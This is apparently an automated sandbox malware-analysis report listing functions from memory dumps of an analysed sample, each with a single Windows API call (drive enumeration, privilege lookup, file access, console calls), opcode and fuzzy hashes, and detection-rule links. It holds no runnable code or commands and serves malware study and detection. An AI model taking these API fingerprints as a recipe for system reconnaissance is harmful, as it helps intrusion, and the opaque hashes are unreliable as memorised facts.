                                                    • Instruction Fuzzy Hash: 1721A4725043809FDB21CF65DC45B96FFF4EF16220F08849EED858B562D335A458DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01B8B04A, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • K32GetModuleInformation.KERNEL32(?,00000E9C,6EDED775,00000000,00000000,00000000,00000000), ref: 01B8B0AE
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2133785597.0000000001B8A000.00000040.00000001.sdmp, Offset: 01B8A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationModule
                                                    • String ID:
                                                    • API String ID: 3425974696-0
                                                    • Opcode ID: 4e69ecd96af088353e35ae696ea912b095d8b70d306b3dcdf1b106b6477565b6
                                                    • Instruction ID: 2bafcbb8d39f56ed12e9d5cbce2acf449ebfbde1b5d702a39ca08bf2228384ac
                                                    • Opcode Fuzzy Hash: 4e69ecd96af088353e35ae696ea912b095d8b70d306b3dcdf1b106b6477565b6
                                                    • Instruction Fuzzy Hash: 1011AF71600300EFEB20DF25DD85FA6BBA8EF04620F0484AAE905CB281D770E909CA71
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01B8BABE, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetConsoleScreenBufferInfo.KERNEL32 ref: 01B8BB2F
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2133785597.0000000001B8A000.00000040.00000001.sdmp, Offset: 01B8A000, based on PE: false
                                                    Similarity
                                                    • API ID: BufferConsoleInfoScreen
                                                    • String ID:
                                                    • API String ID: 3437242342-0
                                                    • Opcode ID: c204c38d591b1615d71e16eea9f0f0553677b410892f31972fe06c6ea6f0d2d3
                                                    • Instruction ID: 814816021ce871817746f50e257a7dc3065da8d3af015c0a4d5f6dd014969a42
                                                    • Opcode Fuzzy Hash: c204c38d591b1615d71e16eea9f0f0553677b410892f31972fe06c6ea6f0d2d3
                                                    • Instruction Fuzzy Hash: 4C21A1725093C09FEB128B25DC55A92BFA4EF07320F0984DBDD858F263D264A908DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01B8AAAB, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01B8AB1A
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2133785597.0000000001B8A000.00000040.00000001.sdmp, Offset: 01B8A000, based on PE: false
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    • Opcode ID: b99feccee00f6658cbc835e0559ae111a35e5e48dce4b0a98318e33211fb2b85
                                                    • Instruction ID: 7af05f5ac94b5415507e8ca12aaf81b4e7b35c389401b6794e5558b7156c7e48
                                                    • Opcode Fuzzy Hash: b99feccee00f6658cbc835e0559ae111a35e5e48dce4b0a98318e33211fb2b85
                                                    • Instruction Fuzzy Hash: 052163716053809FD722CF29DC44B52BFA8EF46611F0884EAED45DB652D265E404CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 022110D4, Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetThreadUILanguage.KERNEL32(?), ref: 02211148
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2135681430.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguageThread
                                                    • String ID:
                                                    • API String ID: 243849632-0
                                                    • Opcode ID: d58b16dfb6bafe8bd6dc4501193723b6aadad74881ccb96fc786178603af1012
                                                    • Instruction ID: a89b75b3bc5a96ccf24ae33f3adf51e9f0e56ab365e82dbeb9efc47f44b7cf3f
                                                    • Opcode Fuzzy Hash: d58b16dfb6bafe8bd6dc4501193723b6aadad74881ccb96fc786178603af1012
                                                    • Instruction Fuzzy Hash: 5B216D6140E3C0AFD7138B659C54A62BFB4EF57620F0980DBDD858F2A3D2695818D7B2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01B8AF62, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • K32EnumProcessModules.KERNEL32(?,00000E9C,6EDED775,00000000,00000000,00000000,00000000), ref: 01B8AFBE
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2133785597.0000000001B8A000.00000040.00000001.sdmp, Offset: 01B8A000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumModulesProcess
                                                    • String ID:
                                                    • API String ID: 1082081703-0
                                                    • Opcode ID: b85fa1926d2969a88d11c370cf4222d9b37c0453b4d24f581cd288956dd7ca5b
                                                    • Instruction ID: 28261c6ad4c4ac8e2b962b92c96803a96361f666477922ca5bb125161867bf63
                                                    • Opcode Fuzzy Hash: b85fa1926d2969a88d11c370cf4222d9b37c0453b4d24f581cd288956dd7ca5b
                                                    • Instruction Fuzzy Hash: 2011C471500300EFEB21EF65DC85BA6FBA8EF44720F1485AAED05CB281D770A905CBB1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02210886, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ReadFile.KERNELBASE(?,00000E9C,6EDED775,00000000,00000000,00000000,00000000), ref: 022108E5
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2135681430.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    • Opcode ID: a62c58ee2221167f61192ce246e4022ac1af72df460310c6c61af7e55ba4bcfb
                                                    • Instruction ID: d0c7d005e5a49157d712fec61063614e984087b9c8ea1401c98e699f00cdd496
                                                    • Opcode Fuzzy Hash: a62c58ee2221167f61192ce246e4022ac1af72df460310c6c61af7e55ba4bcfb
                                                    • Instruction Fuzzy Hash: 7511C172410300EFFB21DF91DC85FA6FBE8EF14720F04855AED499A245D671A544CBB1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01B8BA10, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01B8BA7E
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2133785597.0000000001B8A000.00000040.00000001.sdmp, Offset: 01B8A000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 07625442e77615f2c8e2b8e585338b54e04a2f6f74a0aa8aafaf7c6a1da9cb20
                                                    • Instruction ID: 832f7548a56130c3ece693147eb38163b2f62a6a5745959b3ebb99e317dde677
                                                    • Opcode Fuzzy Hash: 07625442e77615f2c8e2b8e585338b54e04a2f6f74a0aa8aafaf7c6a1da9cb20
                                                    • Instruction Fuzzy Hash: 0011AF72508380AFDB22CF65CC84B52FFF4EF05210F08849EE9898B662D375E418CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 022112D8, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0221132F
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2135681430.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false
                                                    Similarity
                                                    • API ID: AttributeConsoleText
                                                    • String ID:
                                                    • API String ID: 646522457-0
                                                    • Opcode ID: bdec6a1e12bffdf741fa27b31a201a8beb62554fb391c4d8075107be52e1f18f
                                                    • Instruction ID: 68047bd7f44739ac2aa846124623affe1f354c55e59b90d1c3faa3492aad6834
                                                    • Opcode Fuzzy Hash: bdec6a1e12bffdf741fa27b31a201a8beb62554fb391c4d8075107be52e1f18f
                                                    • Instruction Fuzzy Hash: 1011C1715083809FDB118F65DC89B96FFE4EF06220F0884EEED498F252D275A808CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01B8A33C, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetErrorMode.KERNELBASE(?), ref: 01B8A39C
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2133785597.0000000001B8A000.00000040.00000001.sdmp, Offset: 01B8A000, based on PE: false
                                                    Similarity
                                                    • API ID: ErrorMode
                                                    • String ID:
                                                    • API String ID: 2340568224-0
                                                    • Opcode ID: 4ef0eac9c27db0c23eade4f1ff19492d012f62d488467458491e2e17e7452dce
                                                    • Instruction ID: 5f3ab62f9c62aa9aff3fb75c170799a05bee8450ec237cd81e11d8a891f1a608
                                                    • Opcode Fuzzy Hash: 4ef0eac9c27db0c23eade4f1ff19492d012f62d488467458491e2e17e7452dce
                                                    • Instruction Fuzzy Hash: B8118F714093C09FE7128B25DC54A62BFB4DF47614F0880CBEDC54F253D265A808DB72
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 022105E8, Relevance: 1.6, APIs: 1, Instructions: 54fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • UnmapViewOfFile.KERNELBASE(?), ref: 02210640
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2135681430.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false
                                                    Similarity
                                                    • API ID: FileUnmapView
                                                    • String ID:
                                                    • API String ID: 2564024751-0
                                                    • Opcode ID: dc43d9800df752c5662a4b5049b15800f781b62d0c7d3f57ebfebb5e82eed36f
                                                    • Instruction ID: e260ce2edd6527e69955102c515d8833f80f5943ecf665c43c268564ac23c8b4
                                                    • Opcode Fuzzy Hash: dc43d9800df752c5662a4b5049b15800f781b62d0c7d3f57ebfebb5e82eed36f
                                                    • Instruction Fuzzy Hash: 7811C2755093C09FDB128B25DC99B52FFB4DF52220F0880DBED858B663D265A908CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0221092F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSystemInfo.KERNELBASE(?), ref: 0221099C
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2135681430.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false
                                                    Similarity
                                                    • API ID: InfoSystem
                                                    • String ID:
                                                    • API String ID: 31276548-0
                                                    • Opcode ID: 482afffbe51256d2d9b71469fa62e5b544c130b3592e30276d71a27bea9eceb9
                                                    • Instruction ID: 855f8be8f70772175dde21ee855d76b30c9a11a436e368f83767a1fbc96c7d44
                                                    • Opcode Fuzzy Hash: 482afffbe51256d2d9b71469fa62e5b544c130b3592e30276d71a27bea9eceb9
                                                    • Instruction Fuzzy Hash: 531190714093C49FE7228B65DC55B92BFA4EF17324F0980DADD844B263D265A948CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01B8AA0F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetConsoleOutputCP.KERNEL32 ref: 01B8AA71
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2133785597.0000000001B8A000.00000040.00000001.sdmp, Offset: 01B8A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleOutput
                                                    • String ID:
                                                    • API String ID: 3985236979-0
                                                    • Opcode ID: 03f1e64e6e41247d92b0d6f0d603ca5f2cfa1de3c621539186bd9adf672c8502
                                                    • Instruction ID: c939724f74f4a5c91200217ad8dc5ff80d0d17178a64cf8b772768688fe4d6af
                                                    • Opcode Fuzzy Hash: 03f1e64e6e41247d92b0d6f0d603ca5f2cfa1de3c621539186bd9adf672c8502
                                                    • Instruction Fuzzy Hash: 6911C1754097C09FD7128B25DC85A91BFA0EF03220F0980DBDD858F263D268A909CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01B8AAD2, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01B8AB1A
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2133785597.0000000001B8A000.00000040.00000001.sdmp, Offset: 01B8A000, based on PE: false
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    • Opcode ID: ce8974aa6e7db611c0d3f38bff63cd6ee9ffdfb41bf45387bfd696f6a02cb9c3
                                                    • Instruction ID: 9d0e70640d6ccaa1cc225973b8b94f3a64ed3752cd9715a9a1b46ccd16a1c0a0
                                                    • Opcode Fuzzy Hash: ce8974aa6e7db611c0d3f38bff63cd6ee9ffdfb41bf45387bfd696f6a02cb9c3
                                                    • Instruction Fuzzy Hash: 3F115EB16007009FEB24EF29DC85B56FBD8EB04621F0888AADD09CB642E774E404CA71
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 022107C6, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFileType.KERNELBASE(?,00000E9C,6EDED775,00000000,00000000,00000000,00000000), ref: 02210819
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2135681430.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID:
                                                    • API String ID: 3081899298-0
                                                    • Opcode ID: 836db790e4053119909bcd70c97fa656fed382a37918f575be22e753e624d5fc
                                                    • Instruction ID: cedc7399c5ae19813223dfeaedb60c5631c7d99c84a486ac89fce0d309a33f2c
                                                    • Opcode Fuzzy Hash: 836db790e4053119909bcd70c97fa656fed382a37918f575be22e753e624d5fc
                                                    • Instruction Fuzzy Hash: 8D010C71514300EFFB209F51DC85FA6FB98DF04720F04C0AAED088A285D6B4AA48CAB2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 022113AA, Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2135681430.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleWrite
                                                    • String ID:
                                                    • API String ID: 2657657451-0
                                                    • Opcode ID: 74223ee340ee60fa8d93d0df7f4f09832c642cff291ed08898e574b9c9c00c1e
                                                    • Instruction ID: a3b99cd14461a89df8713a2464b99a2f6ef55dd2cd52df55cbe7fbdc86880a17
                                                    • Opcode Fuzzy Hash: 74223ee340ee60fa8d93d0df7f4f09832c642cff291ed08898e574b9c9c00c1e
                                                    • Instruction Fuzzy Hash: 5B11E175520700DFEB20CF95DC85F66FBE4EF14620F0884AAED098B615D371E418CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01B8AB75, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLogicalDrives.KERNELBASE ref: 01B8ABC9
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2133785597.0000000001B8A000.00000040.00000001.sdmp, Offset: 01B8A000, based on PE: false
                                                    Similarity
                                                    • API ID: DrivesLogical
                                                    • String ID:
                                                    • API String ID: 999431828-0
                                                    • Opcode ID: 3cdf660ade50068dcb233eaf51eb982461fa66d735cc61c12fcc844490f67bda
                                                    • Instruction ID: 09d27b3d2d42806f185a9716186825473a9a69196c68153b7859d4094601b39e
                                                    • Opcode Fuzzy Hash: 3cdf660ade50068dcb233eaf51eb982461fa66d735cc61c12fcc844490f67bda
                                                    • Instruction Fuzzy Hash: E511CEB58093809FDB11CF65DC89B82BFA4EF42220F0984EBDD488F253D274A508CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01B8BA32, Relevance: 1.5, APIs: 1, Instructions: 49fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01B8BA7E
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2133785597.0000000001B8A000.00000040.00000001.sdmp, Offset: 01B8A000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 788c41676aa9a3451a4cf907c4fb8c66cff64266c3884e054853e138d8d1377b
                                                    • Instruction ID: 59f6ea3315a9aa4f8561f095a625cdb1fd4dbadf8d45b20647489d750eaccd9d
                                                    • Opcode Fuzzy Hash: 788c41676aa9a3451a4cf907c4fb8c66cff64266c3884e054853e138d8d1377b
                                                    • Instruction Fuzzy Hash: DB11A172500700DFEB21DF65DD84B52FFE4EF04711F0885AADD898A612D771E414DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02210196, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleTitleW.KERNEL32(?), ref: 022101D0
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2135681430.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleTitle
                                                    • String ID:
                                                    • API String ID: 3358957663-0
                                                    • Opcode ID: 6eabbf53ead00d4f87ee90b8694b59d7fb863773c00311fff36dfde84c689e67
                                                    • Instruction ID: d830e266aa2ba1a4350f78e54efdc8f016c65440433079796ab2bd30c8d76f60
                                                    • Opcode Fuzzy Hash: 6eabbf53ead00d4f87ee90b8694b59d7fb863773c00311fff36dfde84c689e67
                                                    • Instruction Fuzzy Hash: C6019E716103049FEB10DFA9DC85B66FBE8DB10220F0884AADC09CB656D6B8E544CA61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0221104E, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0221109E
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2135681430.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationVolume
                                                    • String ID:
                                                    • API String ID: 2039140958-0
                                                    • Opcode ID: e8d2c593c7ae75325c54c30e79fc51042b79ff87508f95ae0b6f6eca72fad9ea
                                                    • Instruction ID: 30227ebc40850eab2fc8ba08c305d6a36519e626b28500ff6a08874652508598
                                                    • Opcode Fuzzy Hash: e8d2c593c7ae75325c54c30e79fc51042b79ff87508f95ae0b6f6eca72fad9ea
                                                    • Instruction Fuzzy Hash: 0601D471900200AFE310DF26DC46B66FBA8FB84B20F14812AEC088B741D331F515CBE5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01B8A1EE, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 01B8A23E
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2133785597.0000000001B8A000.00000040.00000001.sdmp, Offset: 01B8A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleCtrlHandler
                                                    • String ID:
                                                    • API String ID: 1513847179-0
                                                    • Opcode ID: 12ddd71be2b5a88de2be03649eb5049fe5cabb706be7d673571bb79c08e71425
                                                    • Instruction ID: bd9fa5bdeb33f8ced7471ddc6d6553099dbe29e83ea475ff00492635afe5b102
                                                    • Opcode Fuzzy Hash: 12ddd71be2b5a88de2be03649eb5049fe5cabb706be7d673571bb79c08e71425
                                                    • Instruction Fuzzy Hash: 86018471900600AFE310DF26DC46B66FBA8FB84B20F14856AED089B741D675F515CBE5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 022112FA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0221132F
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2135681430.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false
                                                    Similarity
                                                    • API ID: AttributeConsoleText
                                                    • String ID:
                                                    • API String ID: 646522457-0
                                                    • Opcode ID: fb253985f852a018f1ae5c77cbe980e01c2843f6d213936d4ce69ce4d01645af
                                                    • Instruction ID: 775083583b1ef796db544c6b7dfa8bc98ae126eb930cf5742c27ca84026618f3
                                                    • Opcode Fuzzy Hash: fb253985f852a018f1ae5c77cbe980e01c2843f6d213936d4ce69ce4d01645af
                                                    • Instruction Fuzzy Hash: 2201DF71910340DFEF10DF65DC89BA5FBE4EF04621F08C4AADD098FA4AE675A514CBA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01B8BAFA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetConsoleScreenBufferInfo.KERNEL32 ref: 01B8BB2F
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2133785597.0000000001B8A000.00000040.00000001.sdmp, Offset: 01B8A000, based on PE: false
                                                    Similarity
                                                    • API ID: BufferConsoleInfoScreen
                                                    • String ID:
                                                    • API String ID: 3437242342-0
                                                    • Opcode ID: b61b40208012b571e17afaa408ec5ae74f9152c1f32e22ca90882d7e93e213a3
                                                    • Instruction ID: 552c38453160b142c87f0797aafafb84598b17410a273f6f4a895b97533221d9
                                                    • Opcode Fuzzy Hash: b61b40208012b571e17afaa408ec5ae74f9152c1f32e22ca90882d7e93e213a3
                                                    • Instruction Fuzzy Hash: D001DF71900200DFEB20DF29DD897A5FBA4EF05A21F08C4AADD09CB656E775E804CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 022104B2, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02210502
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2135681430.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false
                                                    Similarity
                                                    • API ID: FolderPath
                                                    • String ID:
                                                    • API String ID: 1514166925-0
                                                    • Opcode ID: 7160edba9e20ab260fa98a7f47d8742f9693f8c54fbc97cdff9a96a369edd9f5
                                                    • Instruction ID: 02fc87e22aa6ecf9c11619a54bb4ab10f43fa4fe200b849606ab642cb98afce8
                                                    • Opcode Fuzzy Hash: 7160edba9e20ab260fa98a7f47d8742f9693f8c54fbc97cdff9a96a369edd9f5
                                                    • Instruction Fuzzy Hash: DA018671900600ABD310DF16DC46F26FBB4FB88B20F14815AED085B741D675F515CBE6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02210F76, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetDriveTypeW.KERNELBASE(?), ref: 02210FB0
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2135681430.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false
                                                    Similarity
                                                    • API ID: DriveType
                                                    • String ID:
                                                    • API String ID: 338552980-0
                                                    • Opcode ID: 067cffd4893e104dbbfdeb7e58ea3f97b8565093dd08c316262b3d65a7ed6e45
                                                    • Instruction ID: 8e2c03dbebdab863e7e1cb0c028e90761679277781f31332f6f82361b2000313
                                                    • Opcode Fuzzy Hash: 067cffd4893e104dbbfdeb7e58ea3f97b8565093dd08c316262b3d65a7ed6e45
                                                    • Instruction Fuzzy Hash: AB01DF71920304DFEB10DF55D886B66FBD4EF10220F18C4AADC088F20ADB74E548CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01B8A8FA, Relevance: 1.5, APIs: 1, Instructions: 43threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 01B8A94A
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2133785597.0000000001B8A000.00000040.00000001.sdmp, Offset: 01B8A000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguagesPreferredThread
                                                    • String ID:
                                                    • API String ID: 842807343-0
                                                    • Opcode ID: fab1032a2ff3d109e4ec9ced8f8034f3e62c51815e99b007aef9a0f116dbaf67
                                                    • Instruction ID: f8adb75fca7a09e827ac705a4e4812626ea6af99631986eed6fb50acf0cb0d47
                                                    • Opcode Fuzzy Hash: fab1032a2ff3d109e4ec9ced8f8034f3e62c51815e99b007aef9a0f116dbaf67
                                                    • Instruction Fuzzy Hash: 72018671900600ABD310DF16DC46F26FBB4FB88B20F14815AED085B741D675F515CBE6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0221060E, Relevance: 1.5, APIs: 1, Instructions: 39fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • UnmapViewOfFile.KERNELBASE(?), ref: 02210640
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2135681430.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false
                                                    Similarity
                                                    • API ID: FileUnmapView
                                                    • String ID:
                                                    • API String ID: 2564024751-0
                                                    • Opcode ID: 281c30b38ad9cabcdd337dececca449289821ce255cd6513eb80638fd6ce4192
                                                    • Instruction ID: 1eaed785da07cbc5c510596782c1c1701198d4bf240c94ef5fc28f69ffcf1f51
                                                    • Opcode Fuzzy Hash: 281c30b38ad9cabcdd337dececca449289821ce255cd6513eb80638fd6ce4192
                                                    • Instruction Fuzzy Hash: 3D01F475910740DFEB108F55D889B65FBE0DF51721F08C0AADC098B756D6B4E548CEA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01B8AB9A, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLogicalDrives.KERNELBASE ref: 01B8ABC9
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2133785597.0000000001B8A000.00000040.00000001.sdmp, Offset: 01B8A000, based on PE: false
                                                    Similarity
                                                    • API ID: DrivesLogical
                                                    • String ID:
                                                    • API String ID: 999431828-0
                                                    • Opcode ID: 54413fa67022e61469a33ed47b103eff0c46183d9c686b2edfdb307b013b4e1c
                                                    • Instruction ID: 16bd76e80b510ca66ecdad03b4bb41314f8d06321f83443afb2014e935f8464c
                                                    • Opcode Fuzzy Hash: 54413fa67022e61469a33ed47b103eff0c46183d9c686b2edfdb307b013b4e1c
                                                    • Instruction Fuzzy Hash: 9001AD71404640DFEB10EF69D889B91FB94DB00621F08C4EBCD098F202D774A404CAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02211116, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetThreadUILanguage.KERNEL32(?), ref: 02211148
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2135681430.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguageThread
                                                    • String ID:
                                                    • API String ID: 243849632-0
                                                    • Opcode ID: acafc7955d071e1e243b70f6ebb971a34b4f07af06e5161c59b322361639686c
                                                    • Instruction ID: a5fe300ed68e88805b76afb9c19eece7a0ed2e9e73e0a84fd8eaecec7ca9b66f
                                                    • Opcode Fuzzy Hash: acafc7955d071e1e243b70f6ebb971a34b4f07af06e5161c59b322361639686c
                                                    • Instruction Fuzzy Hash: FAF0FF34520740DFEB20CF45D889B61FBE0EF01A22F08C09ACE094B726D6B5A458CAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0221096A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSystemInfo.KERNELBASE(?), ref: 0221099C
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2135681430.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false
                                                    Similarity
                                                    • API ID: InfoSystem
                                                    • String ID:
                                                    • API String ID: 31276548-0
                                                    • Opcode ID: 9d8c628cd13e5d6eee2c6c79fa1a07d3b6662ff1e208b2698534632d507b4b0c
                                                    • Instruction ID: 2475c2a4a41fdf915b9bcd69a9ce567e86f5f8e4e5639a57b994b9cb4dc50e50
                                                    • Opcode Fuzzy Hash: 9d8c628cd13e5d6eee2c6c79fa1a07d3b6662ff1e208b2698534632d507b4b0c
                                                    • Instruction Fuzzy Hash: 70F02834810300DFEB30DF45D888B21FBD0DF14721F08C09ACC490B30AD3B5A544CAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01B8A36A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetErrorMode.KERNELBASE(?), ref: 01B8A39C
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2133785597.0000000001B8A000.00000040.00000001.sdmp, Offset: 01B8A000, based on PE: false
                                                    Similarity
                                                    • API ID: ErrorMode
                                                    • String ID:
                                                    • API String ID: 2340568224-0
                                                    • Opcode ID: 2d11554b7bf7e24eb09166834722e9104b6c4e6bc72cc062466fd5df7b1dc888
                                                    • Instruction ID: a067156f9546bc5d470478085d224aec0d629958c71835055dbec7f57e6eacf5
